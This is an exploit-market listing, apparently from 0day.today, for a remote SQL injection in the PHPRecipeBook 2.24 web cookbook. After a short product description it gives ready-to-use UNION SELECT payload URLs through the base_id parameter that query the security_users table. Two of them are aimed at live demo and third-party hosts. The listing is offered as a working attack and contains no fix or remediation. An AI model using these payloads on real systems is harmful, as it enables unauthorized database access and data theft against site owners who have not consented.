[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability

Author
d3b4g
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4919
Category
web applications
Date add
09-03-2009
Platform
unsorted
===============================================================
PHPRecipeBook 2.24 (base_id) Remote SQL Injection Vulnerability
===============================================================


[+] PHPRecipeBook 2.24 (_id)Remort SQL Injection Vulnerability
[+] Discovered By d3b4g 
[+] script: http://phprecipebook.sourceforge.net/demo/phprecipebook/                 


About:
------>
PHPRecipeBook is a Web-based cookbook with the 
ability to create shopping lists from recipes selected.
The lists can be saved and later reloaded and edited. 
The shopping list also attempts to combine similar items
so that duplication does not occur. 



/* start

0x1 

Proof of concept 
-------------------------------------

Exploit:http:localhost.com[path]index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:1 http://phprecipebook.sourceforge.net/demo/phprecipebook/index.php?m=recipes&a=search&search=yes&base_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--

Demo:2 http://recipes.casetaintor.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,concat(0x3a,@@version),4,5,6,7+from+security_users--


/* end

-------------------------------------
From Tiny Little island of Maldivies 
-------------------------------------





#  0day.today [2024-12-25]  #